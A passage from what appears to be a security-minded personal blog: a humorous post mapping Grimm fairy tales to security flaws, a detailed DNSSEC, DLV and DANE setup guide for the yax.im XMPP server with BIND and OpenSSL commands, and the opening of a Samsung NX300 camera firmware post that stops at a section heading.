It is that time of the year again, and so we are proud to present a special revelation for Christmas!

The Brothers Grimm were not only academics, linguists, cultural researchers, lexicographers and authors, but also the world's first IT security analysts. They wrote their so-called fairy tales to document different kinds of security vulnerabilities, attacks and even some countermeasures. This article analyzes select examples and emphasizes the relevant lessons. Basic knowledge of the referenced stories is required to follow the analysis.

Rumpelstiltskin - A Badly Implemented Crypto Locker

Rumpelstiltskin, a typical script kiddie, lures the miller's daughter into installing a crypto locker Trojan. Once she becomes the queen, the crypto locker makes her firstborn child inaccessible, providing a three-day unlock period.

Fortunately for the royal family, the implementation is flawed in two ways. Not only does it lack protection against brute force attacks, it also has a very weak password hard-coded into it.

The queen organizes a massively parallel brute-force attack, employing all of the kingdom's available system resources. Finally, she manages to guess the right password and regains access to her firstborn.

Lessons learned:
  • Never install software from untrusted sources.
  • Do not use your username as your password.
  • Properly protect your system against brute-force attacks.

The Wolf and the Seven Young Goats - Outsourced Biometric Access Control Systems

The Big Bad Wolf is an obvious black-hat actor who wants to gain access to the goats' house. The mother goat, who needs to leave the home, has put into place a biometric access control system based on two factors: optical paw recognition and voice identification.

However, instead of deploying an implementation with known failure rate characteristics, she creates an insufficient requirements specification ("you will know him at once by his rough voice and his black feet.") and outsources the implementation to her kids, who do not have prior experience or formal education in the domain.

Besides creating an implementation that uses too few biometric features to allow for robust identification and authentication, the presented solution also exposes the exact cause of the authentication failure to the attacker ("[Our mother] has a soft, pleasant voice, but your voice is rough, you are the wolf." and "our mother has not black feet like you, you are the wolf."). This exposure of internal error causes allows the attacker to improve his approach and to succeed at the third attempt.

Lessons learned:
  • Take the time to properly specify security system requirements.
  • Do not outsource the development of mission-critical systems.
  • Only use biometrics as a supplementary mechanism to another access control system.
  • Do not expose internal error messages to potential attackers.
  • Properly protect your system against brute-force attacks.

Snow White - Social Media and Identity Theft

After driving the young Snow White out of the family home, the queen stepmother watches social media for signs of beautiful people (using a monitoring application called the "wonderful looking-glass"). She deploys a self-written face recognition algorithm that scans pictures tagged as #beautiful and returns a beauty index value (unfortunately, this detail is lost in the English translation; the German original reads "Aber Schneewittchen ist tausendmal schöner als Ihr." - "Snow White is a thousand times as beautiful as you are.").

Meanwhile Snow White, who is living in a safe house operated by the Seven Dwarfs charity organization, ignores the instructions to leave behind her social media presence, and posts geo-tagged selfies without properly scrubbing the metadata.

The queen's monitoring application notifies her of the newly analyzed pictures. Alerted by this, she obtains Snow White's geo-location from the pictures and performs a series of social engineering attacks. She uses stolen identity information from different sales representatives to successfully gain access to the safe house and to eventually poison Snow White.

Lessons learned:
  • Stop using your social media when going undercover, no matter how hard it is.
  • Social engineering is very effective, and in most cases it is not sufficient to teach employees about it. Additional safeguards like double checking are needed.

Sleeping Beauty - Exploiting an Off-by-One Remote Vulnerability

The kingdom in question has thirteen IT security experts (who, due to the lack of better wording in 1857, were called "the wise women"). One of them is not invited to the release party, so she instead performs an unsolicited penetration test. During her testing, she creates a specially-crafted message ("The king's daughter shall in her fifteenth year prick herself with a spindle, and fall down dead.") that exploits an off-by-one vulnerability in the dining service implementation.

Initially, the message was designed to crash the newly-forked child thread, but due to the sand-boxing and ASLR techniques deployed by the twelfth wise woman, the whole application gets suspended into the interactive debugging console instead. This event triggers an automatic firewall rule, temporarily blocking all external access to the application.

Due to the lack of a monitoring system, the production service is down for a noticeable time ("asleep for a hundred years"), but eventually, a rock-star developer is found and hired (the "king's son"). He is able to circumvent the firewall and to access the server console. From there, he reconstructs the stack and is able to continue application execution, and they live contented to the end of their days.

Lessons learned:
  • Bug bounties are a good way to focus curiosity and to learn about vulnerabilities.
  • Production services should be properly monitored to detect downtime.

Have a nice holiday season and a merry new year!


Posted 2016-12-22 18:25:26

.IM + DNSSEC + DLV + DANE + XMPP + TLSA ("TLSA" does not stand for anything; it is just the name of the RRtype)

Okay, seriously: this post is about securing an XMPP server running on an .IM domain with DNSSEC, using yax.im as a real-life example. In the world of HTTP there is HPKP, and browsers come with a long list of pre-pinned site certificates for the who's who of the modern web. For XMPP, DNSSEC is the only viable way to extend the broken Root CA trust model with a slightly-less-broken hierarchical trust model from DNS (there is also TACK, which is impossible to deploy because it modifies the TLS protocol, and is also unmaintained).

Because the .IM TLD is not DNSSEC-signed yet, we will need to use DLV (DNSSEC Look-aside Validation), an additional DNSSEC trust root operated by the ISC (until the end of 2016). Furthermore, we will need to set up the correct entries for yax.im (the XMPP service domain), chat.yax.im (the conference domain) and xmpp.yax.im (the actual server running the service).

This post has been sitting in the drafts folder for a while, but now that DANE-SRV has been promoted to Proposed Standard, it was a good time to finalize the article.


Our (real-life) scenario is as follows: the XMPP service yax.im is run on a server named xmpp.yax.im (for historical reasons, the host yax.im is a web server forwarding to yaxim.org, not the actual XMPP server). The service furthermore hosts the chat.yax.im conference service, which needs to be accessible from other XMPP servers as well.

In the following, we will create SRV DNS records to advertise the server name, obtain a TLS certificate, configure DNSSEC on both domains and create (signed) DANE records that define which certificate a client can expect when connecting.

Once this is deployed, state-level attackers will not be able to MitM users of the service simply by issuing rogue certificates; they would also have to compromise the DNSSEC chain of trust (in our case one of the following: ICANN/VeriSign, DLV, PIR or the registrar/NS hosting our domains), essentially limiting the number of states able to pull this off to one.

Creating SRV Records for XMPP

The service / server separation is made possible with the SRV record in DNS, which is a more generic variant of records like MX (e-mail server) or NS (domain name server) and defines which server is responsible for a given service on a given domain.

For XMPP, we create the following three SRV records to allow clients (_xmpp-client._tcp), servers (_xmpp-server._tcp) and conference participants (_xmpp-server._tcp on chat.yax.im) to connect to the right server:

_xmpp-client._tcp.yax.im.      IN SRV 5 1 5222 xmpp.yax.im.
_xmpp-server._tcp.yax.im.      IN SRV 5 1 5269 xmpp.yax.im.
_xmpp-server._tcp.chat.yax.im. IN SRV 5 1 5269 xmpp.yax.im.

The record syntax is: priority (5), weight (1), port (5222 for clients, 5269 for servers) and host (xmpp.yax.im). Priority and weight are used for load-balancing multiple servers, which we are not using.

Attention: some clients (or their respective DNS resolvers, often hidden in outdated, cheap, plastic junk routers provided by your "broadband" ISP) fail to resolve SRV records, and thus fall back to the A record. If you set up a new XMPP server, you will slightly improve your availability by ensuring that the A record (yax.im in our case) points to the XMPP server as well. However, DNSSEC will be even more of a challenge for them, so let's write them off for now.
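To check what a resolver actually returns for these records, a quick query helps (a sketch, assuming the yax.im records defined above):

$ dig +short _xmpp-client._tcp.yax.im SRV
5 1 5222 xmpp.yax.im.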

Obtaining a TLS Certificate for XMPP

While DANE allows rolling out self-signed certificates, our goal is to stay compatible with clients and servers that do not deploy DNSSEC yet. Therefore, we need a certificate issued by a trustworthy member of the Certificate Extortion ring. Currently, StartSSL and WoSign offer free certificates, and Let's Encrypt is about to launch.

Both StartSSL and WoSign offer a convenient function to generate your keypair. DO NOT USE THAT! Create your own keypair! This "feature" will allow the CA to decrypt your traffic (unless all your clients deploy PFS, which they don't) and only makes sense if the CA is operated by an Intelligence Agency.
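Generating the keypair locally is straightforward with standard OpenSSL tools (a minimal sketch; the file names and the subject are placeholders, and only the CSR gets submitted to the CA):

# generate a 4096-bit RSA key and a certificate signing request locally
openssl genrsa -out yax.im.key 4096
openssl req -new -key yax.im.key -subj "/CN=yax.im" -out yax.im.csr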

What You Ask For...

The certificate we are about to obtain must be somehow tied to our XMPP service. We have three different names (yax.im, chat.yax.im and xmpp.yax.im), and the obvious question is: which one should be entered into the certificate request?

Fortunately, this is easy to find out, as it is well-defined in the XMPP Core specification, section 13.7:

In a PKIX certificate to be presented by an XMPP server (i.e., a "server certificate"), the certificate SHOULD include one or more XMPP addresses (i.e., domainparts) associated with XMPP services hosted at the server. The rules and guidelines defined in [TLS‑CERTS] apply to XMPP server certificates, with the following XMPP-specific considerations:

  • Support for the DNS-ID identifier type [PKIX] is REQUIRED in XMPP client and server software implementations. Certification authorities that issue XMPP-specific certificates MUST support the DNS-ID identifier type. XMPP service providers SHOULD include the DNS-ID identifier type in certificate requests.

  • Support for the SRV-ID identifier type [PKIX‑SRV] is REQUIRED for XMPP client and server software implementations (for verification purposes XMPP client implementations need to support only the "_xmpp-client" service type, whereas XMPP server implementations need to support both the "_xmpp-client" and "_xmpp-server" service types). Certification authorities that issue XMPP-specific certificates SHOULD support the SRV-ID identifier type. XMPP service providers SHOULD include the SRV-ID identifier type in certificate requests.

  • [...]

Translated into English, our certificate SHOULD contain yax.im and chat.yax.im according to [TLS-CERTS], which is "Representation and Verification of Domain-Based Application Service Identity within Internet Public Key Infrastructure Using X.509 (PKIX) Certificates in the Context of Transport Layer Security (TLS)", or RFC 6125 for short. There, section 2.1 defines that there is the CN-ID (Common Name, which used to be the only entry identifying a certificate), one or more DNS-IDs (baseline entries usable for any services) and one or more SRV-IDs (service-specific entries, e.g. for XMPP). DNS-IDs and SRV-IDs are stored in the certificate as subject alternative names (SAN).

Following the above XMPP Core quote, a CA must support adding a DNS-ID and should support adding an SRV-ID field to the certificate. Clients and servers must support both field types. The SRV-ID is constructed according to RFC 4985, section 2, where it is called SRVName:

The SRVName, if present, MUST contain a service name and a domain name in the following form:

_Service.Name

For our XMPP scenario, we would need three SRV-IDs (_xmpp-client.yax.im for clients, _xmpp-server.yax.im for servers, and _xmpp-server.chat.yax.im for the conference service; all without the _tcp. part we had in the SRV record). In addition, the two DNS-IDs yax.im and chat.yax.im are recommended by the specification, allowing the certificate to be (ab)used for HTTPS as well.

Update: The quoted specifications allow creating an XMPP-only certificate based on SRV-IDs, one that contains no DNS-IDs (and has a non-hostname CN). Such a certificate could be used to delegate XMPP operations to a third party, or to limit the impact of leaked private keys. However, you will have a hard time convincing a public CA to issue one, and once you get it, it will be refused by most clients due to lack of SRV-ID implementation.

And then there is one more thing. RFC 7673 also proposes checking the certificate for the SRV destination (xmpp.yax.im in our case) if the SRV record was properly validated, there is no associated TLSA record, and the application user was born under the Virgo zodiac sign.

Summarizing the different possible entries in our certificate, we get the following picture:

Name(s)                                    Field Type        Meaning
yax.im or chat.yax.im                      Common Name (CN)  Legacy name for really old clients and servers.
yax.im, chat.yax.im                        DNS-IDs (SAN)     Required entry telling us that the host serves anything on the two domain names.
_xmpp-client.yax.im, _xmpp-server.yax.im   SRV-IDs (SAN)     Optional entry telling us that the host serves XMPP to clients and servers.
_xmpp-server.chat.yax.im                   SRV-ID (SAN)      Optional entry telling us that the host serves XMPP to servers for chat.yax.im.
xmpp.yax.im                                DNS-ID or CN      Optional entry if you can configure a DNSSEC-signed SRV record but not a TLSA record.

...and What You Actually Get

Most CAs have no way to define special field types. You provide a list of service/host names, the first one is set as the CN, and all of them are stored as DNS-ID SANs. However, StartSSL offers "XMPP Certificates", which look like they might do what we want above. Let's request one from them for yax.im and chat.yax.im and see what we get:

openssl x509 -noout -text -in yaxim.crt
Subject: description=mjp74P5w0cpIUITY, C=DE, CN=yax.im
X509v3 Subject Alternative Name:
    DNS:yax.im, DNS:chat.yax.im, othername:<unsupported>, othername:<unsupported>,
    othername:<unsupported>, othername:<unsupported>

So it's othername:<unsupported>, then? Thank you OpenSSL, for your openness! From RFC 4985 we know that "othername" is the basic type of the SRV-ID SAN, so it looks like we got something more or less correct. Using this script (highlighted source, thanks Zash), we can further analyze what we've got:

  X509v3 Subject Alternative Name:
      SRVName: yax.im
      SRVName: chat.yax.im
      XmppAddr: yax.im
      XmppAddr: chat.yax.im
      DNS: yax.im
      DNS: chat.yax.im

Alright, the two service names we submitted turned out under three different field types:

  • SRV-ID (it's missing the _xmpp-client. / _xmpp-server. part and is thus invalid)
  • xmppAddr (this was the correct entry type in the deprecated RFC 3920 XMPP specification, but is now only allowed in client certificates)
  • DNS-ID (wow, these ones happen to be correct!)

While this is not quite what we wanted, it is sufficient to allow a correctly implemented client to connect to our server, without raising certificate errors.

Configuring DNSSEC for Your Domain(s)

In the next step, the domain (in our case both yaxim.org and yax.im, but the following examples will only list yax.im) needs to be signed with DNSSEC. Because I'm a lazy guy, I'm using BIND 9.9, which does inline-signing (all I need to do is create some keys and enable the feature).

Key Creation with BIND 9.9

For each domain, a zone signing key (ZSK) is needed to sign the individual records. Furthermore, a key signing key (KSK) should be created to sign the ZSK. This allows you to rotate the ZSK as often as you wish.

# create key directory
mkdir /etc/bind/keys
cd /etc/bind/keys
# create key signing key
dnssec-keygen -f KSK -3 -a RSASHA256 -b 2048 yax.im
# create zone signing key
dnssec-keygen -3 -a RSASHA256 -b 2048 yax.im
# make all keys readable by BIND
chown -R bind.bind .

To enable it, you need to configure the key directory, inline signing and automatic re-signing:

zone "" {
    key-directory "/etc/bind/keys";
    inline-signing yes;
    auto-dnssec maintain;

After reloading the config, the keys need to be enabled in BIND:

# load keys and check if they are enabled
$ rndc loadkeys yax.im
$ rndc signing -list yax.im
Done signing with key 17389/RSASHA256
Done signing with key 24870/RSASHA256

The above steps need to be performed for yaxim.org as well.
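To confirm that the zone is now actually served with signatures, any record can be queried with DNSSEC data enabled (a quick check against the local BIND; the output is abbreviated here):

$ dig @localhost yax.im SOA +dnssec +noall +answer
yax.im.  86400  IN  SOA    ...
yax.im.  86400  IN  RRSIG  SOA 8 2 86400 ...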

NSEC3 Against Zone Walking

Finally, we also want to enable NSEC3 to prevent curious people from "walking the zone", i.e. retrieving a full list of all host names under our domains. To accomplish that, we need to specify some parameters for hashing names. These parameters will be published in an NSEC3PARAM record, which resolvers can use to apply the same hashing mechanism as we do.

First, the hash function to be used. RFC 5155, section 4.1 tells us that...

"The acceptable values are the same as the corresponding field in the NSEC3 RR."

NSEC3 is also defined in RFC 5155, albeit in section 3.1.1. There, we learn that...

"The values for this field are defined in the NSEC3 hash algorithm registry defined in Section 11."

It's right there... at the end of the section:

Finally, this document creates a new IANA registry for NSEC3 hash algorithms. This registry is named "DNSSEC NSEC3 Hash Algorithms". The initial contents of this registry are:

0 is Reserved.

1 is SHA-1.

2-255 Available for assignment.

Let's pick 1 from this plethora of choices, then.

The second parameter is "Flags", which is also defined in Section 11, and must be 0 for now (other values are yet to be defined).

The third parameter is the number of iterations for the hash function. For a 2048-bit key, it MUST NOT exceed 500. BIND defaults to 10, Strotman references 330 from RFC 4641bis, but it seems that number has since been removed. We take this number anyway.

The last parameter is a salt for the hash function (a random hexadecimal string; we use 8 bytes). You should not copy the value from another domain, to prevent rainbow-table attacks, but there is no need to keep it very secret.

$ rndc signing -nsec3param 1 0 330 $(head -c 8 /dev/random|hexdump -e '"%02x"') yax.im
$ rndc signing -nsec3param 1 0 330 $(head -c 8 /dev/random|hexdump -e '"%02x"') yaxim.org

Whenever you update the NSEC3PARAM value, your zone will be re-signed and re-published. That means you can change the iteration count and salt value later on, if the need should arise.
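The currently active parameters can be read back from DNS (a quick check; the salt shown is whatever was generated above):

$ dig +short yax.im NSEC3PARAM
1 0 330 <salt>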

Configuring the DS (Delegation Signer) Record for yaxim.org

If your domain is on an already-signed TLD (like yaxim.org on .org), you need to establish a trust link from the .org zone to your domain's signature keys (the KSK, to be precise). For this purpose, the delegation signer (DS) record type has been created.

A DS record is a signed record in the parent domain (.org) that identifies a valid key for a given sub-domain (yaxim.org). Multiple DS records can coexist to allow key rollover. If you are running an important service, you should create a second KSK, store it in a safe place, and add its DS in addition to the currently used one. Should your primary name server go up in flames, you can recover without waiting for the domain registrar to update your records.

Exporting the DS Record

To obtain the DS record, BIND comes with the dnssec-dsfromkey tool. Just pipe all your keys into it, and it will output DS records for the KSKs. We do not want SHA-1 records any more, so we pass -2 as well to get the SHA-256 record:

$ dig @localhost yaxim.org DNSKEY | dnssec-dsfromkey -f - -2 yaxim.org
yaxim.org. IN DS 42199 8 2 35E4E171FC21C6637A39EBAF0B2E6C0A3FE92E3D2C983281649D9F4AE3A42533

This line is what you need to submit to your domain registrar (using their web interface or by means of a support ticket). The information contained is:

  • key tag: 42199 (this is just a numeric ID for the key, useful for key rollovers)
  • signature algorithm: 8 (RSA / SHA-256)
  • DS digest type: 2 (SHA-256)
  • hash value: 35E4E171...E3A42533

However, some registrars insist on creating the DS record themselves, and require you to send in your DNSKEY. We only need to give them the KSK (type 257), so we filter the output accordingly:

$ dig @localhost yaxim.org DNSKEY | grep 257
yaxim.org.              86400   IN      DNSKEY  257 3 8 ...

Validation of the Trust Chain

As soon as the record is updated, you can check the trustworthiness of your domain. Unfortunately, all of the available command-line tools suck. One of the least-sucking ones is drill from ldns. It still needs a root.key file that contains the officially trusted DNSSEC key for the . (root) domain. In Debian, the dns-root-data package places it under /usr/share/dns/root.key. Let's drill our domain name with DNSSEC (-D), tracing from the root zone (-T), quietly (-Q):

$ drill -DTQ yaxim.org -k /usr/share/dns/root.key
;; Number of trusted keys: 1
;; Domain: .
[T] . 172800 IN DNSKEY 256 3 8 ;{id = 48613 (zsk), size = 1024b}
. 172800 IN DNSKEY 257 3 8 ;{id = 19036 (ksk), size = 2048b}
[T] org. 86400 IN DS 21366 7 1 e6c1716cfb6bdc84e84ce1ab5510dac69173b5b2 
org. 86400 IN DS 21366 7 2 96eeb2ffd9b00cd4694e78278b5efdab0a80446567b69f634da078f0d90f01ba 
;; Domain: org.
[T] org. 900 IN DNSKEY 257 3 7 ;{id = 9795 (ksk), size = 2048b}
org. 900 IN DNSKEY 256 3 7 ;{id = 56198 (zsk), size = 1024b}
org. 900 IN DNSKEY 256 3 7 ;{id = 34023 (zsk), size = 1024b}
org. 900 IN DNSKEY 257 3 7 ;{id = 21366 (ksk), size = 2048b}
[T] yaxim.org. 86400 IN DS 42199 8 2 35e4e171fc21c6637a39ebaf0b2e6c0a3fe92e3d2c983281649d9f4ae3a42533 
;; Domain: yaxim.org.
[T] yaxim.org. 86400 IN DNSKEY 257 3 8 ;{id = 42199 (ksk), size = 2048b}
yaxim.org. 86400 IN DNSKEY 256 3 8 ;{id = 6384 (zsk), size = 2048b}
[T] yaxim.org.  3600    IN  A <IP>
;;[S] self sig OK; [B] bogus; [T] trusted

The above output traces from the initially trusted . key to org, then to yaxim.org, and determines that yaxim.org is properly DNSSEC-signed and therefore trusted ([T]). This is already a big step, but the tool lacks some color, and it does not allow you to explicitly query the domain's name servers (unless they are open resolvers), so you can't test your config prior to going live.

To get a better view of our DNSSEC situation, we can query online services such as DNSViz, Verisign's DNSSEC Analyzer, or Lutz' livetest.

Ironically, neither DNSViz nor Verisign support encrypted connections via HTTPS, and Lutz' livetest is using an untrusted root.

Enabling DNSSEC Look-aside Validation for yax.im

Unfortunately, we cannot do the same with our short and shiny yax.im domain. If we try to drill it, we get the following:

$ drill -DTQ yax.im -k /usr/share/dns/root.key
;; Number of trusted keys: 1
;; Domain: .
[T] . 172800 IN DNSKEY 256 3 8 ;{id = 48613 (zsk), size = 1024b}
. 172800 IN DNSKEY 257 3 8 ;{id = 19036 (ksk), size = 2048b}
[T] Existence denied: im. DS
;; Domain: im.
;; No DNSKEY record found for im.
;; No DS for yax.im.
;; Domain: yax.im.
[S] yax.im. 86400 IN DNSKEY 257 3 8 ;{id = 17389 (ksk), size = 2048b}
yax.im. 86400 IN DNSKEY 256 3 8 ;{id = 24870 (zsk), size = 2048b}
[S] yax.im. 3600    IN  A <IP>
;;[S] self sig OK; [B] bogus; [T] trusted

There are two pieces of relevant information here:

  • [T] Existence denied: im. DS - the root zone confirms that .IM is not DNSSEC-signed (it has no DS record).
  • [S] yax.im. 3600 IN A <IP> - yax.im is only self-signed, providing no way to check its authenticity.

The .IM top-level domain for the Isle of Man is operated by Domicilium. A friendly support request reveals the following:

Unfortunately there is no ETA for DNSSEC support at this time.

That means there is no way to create a chain of trust from the root zone to yax.im.

Fortunately, the designers of DNSSEC anticipated this problem. To accelerate the adoption of DNSSEC by second-level domains, the concept of look-aside validation was introduced in 2006. It allows using an alternative trust root if the hierarchical chaining is not possible. The ISC is even operating such an alternative trust root. All we need to do is register our domain with them, and add them to our resolvers (because they aren't added by default).

After registering with DLV, we are asked to add our domain with its respective KSK domain key entry. To prove domain and key ownership, we must further create a signed TXT record under dlv.yax.im with a specific value:

dlv.yax.im. IN TXT "DLV:1:fcvnnskwirut"

Afterwards, we request DLV to check our domain. It queries all of the domain's DNS servers for the relevant information and compares the results. Unfortunately, our domain fails the check:

FAILURE <NS IP> has extra: yax.im. 86400 IN DNSKEY 256 3 RSASHA256 ( AwEAAepYQ66j42jjNHN50gUldFSZEfShF...
FAILURE <NS IP> has extra: yax.im. 86400 IN DNSKEY 257 3 RSASHA256 ( AwEAAcB7Fx3T/byAWrKVzmivuH1bpP5Jx...
FAILURE <NS IP> missing: YAX.IM. 86400 IN DNSKEY 256 3 RSASHA256 ( AwEAAepYQ66j42jjNHN50gUldFSZEfShF...
FAILURE <NS IP> missing: YAX.IM. 86400 IN DNSKEY 257 3 RSASHA256 ( AwEAAcB7Fx3T/byAWrKVzmivuH1bpP5Jx...
FAILURE This means your DNS servers are out of sync. Either wait until the DNSKEY data is the same, or fix your server's contents.

This looks like a combination of two different issues:

  1. Some of our name servers return YAX.IM when asked for yax.im.
  2. The DLV script is case-sensitive when it comes to domain names.

Problem #1 is officially not a problem. DNS is case-insensitive, and therefore all clients that fail to accept YAX.IM answers to yax.im requests are broken. In practice, this hits not only the DLV resolver (problem #2), but also the resolver code in Erlang, which is used in the widely-deployed ejabberd XMPP server.

While we can't fix all the broken servers out there, #2 has been reported and fixed, and hopefully the fix has been rolled out to production already. Still, issue #1 needs to be solved.

It turns out that it is caused by case-insensitive response compression. You can't make this stuff up! Fortunately, BIND 9.9.6 added the no-case-compress ACL, so "all you need to do" is to upgrade BIND and enable that shiny new feature.

After checking and re-checking the TXT record with DLV, there is finally progress:

SUCCESS DNSKEY signatures validated.
SUCCESS COOKIE: Good signature on TXT response from <NS IP>
SUCCESS <NS IP> has authentication cookie DLV:1:fcvnnskwirut

After your domain is validated, it will receive its look-aside validation records under dlv.isc.org:

$ dig +noall +answer yax.im.dlv.isc.org DLV
yax.im.dlv.isc.org. 3451    IN  DLV 17389 8 2 C41AFEB57D71C5DB157BBA5CB7212807AB2CEE562356E9F4EF4EACC2 C4E69578
yax.im.dlv.isc.org. 3451    IN  DLV 17389 8 1 8BA3751D202EF8EE9CE2005FAF159031C5CAB68A

This looks like a real success. Except that nobody is using DLV in their resolvers by default, and DLV will stop operations in 2017.

Until then, you can enable look-aside validation in your BIND and Unbound resolvers.
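A minimal sketch of what that might look like (the Unbound anchor file path is an assumption; check where your distribution ships the dlv.isc.org key):

# BIND (options section of named.conf): use the built-in dlv.isc.org anchor
dnssec-lookaside auto;

# Unbound (server: section of unbound.conf):
dlv-anchor-file: "/usr/share/dns/dlv.isc.org.key"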

Lutz' livetest service supports checking DLV-backed domains as well, so we can use it to verify our configuration.

Creating TLSA Records for HTTP and SRV

Now that we have created keys, signed our zones and established trust into them from the root (more or less), we can put more sensitive information into DNS, and our users can verify that it was actually added by us (or one of at most two or three governments: the US, the TLD holder, and the one where your nameservers are hosted).

This allows us to add a second, independent trust root to the TLS certificates we use for our web server (yaxim.org) as well as for our XMPP server, by means of TLSA records.

These record types are defined in RFC 6698 and consist of the following pieces of information:

  • domain name (i.e. yaxim.org)
  • certificate usage (is it a CA or a server certificate, is it signed by a "trusted" Root CA?)
  • selector + matching type + certificate association data (the actual certificate reference, encoded in one of multiple possible forms)

Domain Name

The domain name is the hostname in the case of HTTPS, but it's slightly more complicated for the XMPP SRV record, because there we have the service domain (yax.im), the conference domain (chat.yax.im) and the actual server domain name (xmpp.yax.im).

The behavior for SRV TLSA handling is defined in RFC 7673, published as Proposed Standard in October 2015. First, the client must validate that the SRV response for the service domain is properly DNSSEC-signed. Only then can the client trust that the server named in the SRV record is actually responsible for the service.

In the next step, the client must ensure that the address response (A for IPv4 and AAAA for IPv6) is DNSSEC-signed as well, or fall back to the next SRV record.

If both the SRV and the A/AAAA records are properly signed, the client must do a TLSA lookup for the SRV target (which is _5222._tcp.xmpp.yax.im for our client users, or _5269._tcp.xmpp.yax.im for other XMPP servers connecting to us).
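Once the records from the end of this post are deployed, such a lookup can be checked with dig (a quick sketch; the output is abbreviated):

$ dig +short _5222._tcp.xmpp.yax.im TLSA
1 0 1 CEF7F6418B7D6C8E71A2413F302F92FC97E57EC18B36F97A4493964564C84836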

Certificate Usage

The certificate usage field can take one of four possible values. Translated into English, the possibilities are:

  1. "trusted" CA - the provided cert is a CA cert that is trusted by the client, and the server certificate must be signed by this CA. We could use this to indicate that our server only will use StartSSL-issued certificates.
  2. "trusted" server certificate - the provided cert corresponds to the certificate returned over TLS und must be signed by a trusted Root CA. We will use this to deliver our server certificate.
  3. "untrusted" CA - the provided CA certificate must be the one used to sign the server's certificate. We could roll out a private CA and use this type, but it would cause issues with non-DNSSEC clients.
  4. "untrusted" server certificate - the provided certificate must be the same as returned by the server, and no Root CA trust checks shall be performed.

The Actual Certificate Association

Now that we know the server name for which the certificate is valid and the type of certificate and trust checks to perform, we need to store the actual certificate reference. Three fields are used to encode the certificate reference.

The selector defines whether the full certificate (0) or only the SubjectPublicKeyInfo field (1) is referenced. The latter allows getting the server key re-signed by a different CA without changing the TLSA records. The former could theoretically be used to put the full certificate into DNS (a rather bad idea for TLS, but it might be interesting for S/MIME certs).

The matching type field defines how the "selected" data (certificate or SubjectPublicKeyInfo) is stored:

  • 0 - exact match of the whole "selected" data
  • 1 - SHA-256 hash of the "selected" data
  • 2 - SHA-512 hash of the "selected" data

Finally, the certificate association data is the certificate/SubjectPublicKeyInfo data or hash, as described by the previous fields.
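For reference, the association data for the SubjectPublicKeyInfo variant (selector 1, matching type 1) could be computed with standard OpenSSL tools like this (a sketch; <certfile> stands for your certificate file):

openssl x509 -in <certfile> -pubkey -noout | openssl pkey -pubin -outform DER | openssl sha256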

Putting it all Together

A good configuration for our service is a record based on a CA-issued server certificate (certificate usage 1), with the full certificate (selector 0) hashed via SHA-256 (matching type 1). We can obtain the required association data using OpenSSL command line tools:

openssl x509 -in <certfile> -outform DER | openssl sha256
(stdin)= bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9

Taken together, this results in the following entries for HTTPS on yaxim.org and www.yaxim.org:

_443._tcp.yaxim.org.     IN TLSA 1 0 1 bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9
_443._tcp.www.yaxim.org. IN TLSA 1 0 1 bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9

This is also the SHA-256 fingerprint you can see in your web browser.

For the XMPP part, we need to add TLSA records for the SRV targets (_5222._tcp.xmpp.yax.im for clients and _5269._tcp.xmpp.yax.im for servers). There should be no need to make TLSA records for the service domain (yax.im), because a modern client will always try to resolve SRV records, and no DNSSEC validation will be possible if that fails.

Here, we take the SHA-256 sum of the certificate we obtained from StartSSL, and create two records with the same type and format as above:

_5222._tcp.xmpp.yax.im. IN TLSA 1 0 1 cef7f6418b7d6c8e71a2413f302f92fc97e57ec18b36f97a4493964564c84836
_5269._tcp.xmpp.yax.im. IN TLSA 1 0 1 cef7f6418b7d6c8e71a2413f302f92fc97e57ec18b36f97a4493964564c84836

These fields will be used by DNSSEC-enabled clients to verify the TLS certificate presented by our XMPP service.
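The HTTPS variant can be checked end-to-end with ldns' ldns-dane tool (a sketch; it assumes the tool from the ldns examples package and a DNSSEC-validating resolver, and it only works against plain TLS ports, not against the STARTTLS-based XMPP ports):

$ ldns-dane verify yaxim.org 443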

Replacing the Server Certificate

Now that the TLSA records are in place, it is not as easy to replace your server certificate as it was before, because the old one is now anchored in DNS.

You need to perform the following steps in order to ensure that all clients will be able to connect at any time:

  1. Obtain the new certificate
  2. Create a second set of TLSA records, for the new certificate (keep the old one in place)
  3. Wait for the configured DNS time-to-live to ensure that all users have received both sets of TLSA records
  4. Replace the old certificate on the server with the new one
  5. Remove the old TLSA records

If you fail to add the new TLSA records and wait out the DNS TTL, some clients will have cached a copy of only the old TLSA records, so they will reject your new server certificate.
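Between steps 2 and 5, the zone would contain both associations at once, e.g. (the second hash is a stand-in for the new certificate's SHA-256 value):

_5222._tcp.xmpp.yax.im. IN TLSA 1 0 1 cef7f6418b7d6c8e71a2413f302f92fc97e57ec18b36f97a4493964564c84836
_5222._tcp.xmpp.yax.im. IN TLSA 1 0 1 <SHA-256 hash of the new certificate>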


DANE for XMPP is a chicken-and-egg problem. As long as there are no servers, it will not be implemented in the clients, and vice versa. However, the (currently unavailable) XMPP security analyzer is checking the DANE validation status, and GSoC 2015 brought us DNSSEC support in minidns, which soon will be leveraged in Smack-based XMPP clients.

With this (rather long) post covering all the steps of a successful DNSSEC implementation, including the special challenges of .IM domains, I hope to pave the way for more XMPP server operators to follow.

Enabling DNSSEC and DANE provides an improvement over the rather broken Root CA trust model; however, it is not without controversy. tptacek makes strong arguments against DNSSEC, because it is using outdated crypto and because it doesn't completely solve the government-level MitM problem. Unfortunately, his proposal to "do nothing" will not improve the situation, and the only positive contribution ("use TACK!") expired in 2013.

Finally, one last technical issue not covered by this post is periodic key rollover; this will be covered by a separate post eventually.


Posted 2015-10-16 17:55:42

This is the third post in a series covering the Samsung NX300 "Smart" Camera. In the first post, we analyzed how the camera interacts with the outside world using NFC and WiFi. The second one showed a method to gain a remote root shell, and it spawned a number of interesting projects. This post is a reference collection of these projects, and a call for collaboration.

Samsung NX300 Firmware Update

First, I want to thank Samsung for fixing the most serious security problems in the NX300 firmware. As of firmware version 1.41, the X server is closed down and there is an option to encrypt the WiFi network spawned by the camera with WPA2:

1. Add Wi-Fi Privacy Lock function
2. Revision Open Source Licenses

Unfortunately, the provided 8-digit PIN can be cracked in less than one hour using pyrit on a mid-range GPU. While this is far from good security, it requires at least some dedication from the attacker.

Even more unfortunately, Samsung removed autoexec.sh execution from the NX300M firmware starting with (or after) 1.11. Dear Samsung engineers, if you are reading this: please add it back! Executing code from the SD card (without modifying the firmware image) is a great opportunity, not a security problem! Most of the mods discussed in this post are leveraging that functionality in a creative way!

Automatic Photo Backups

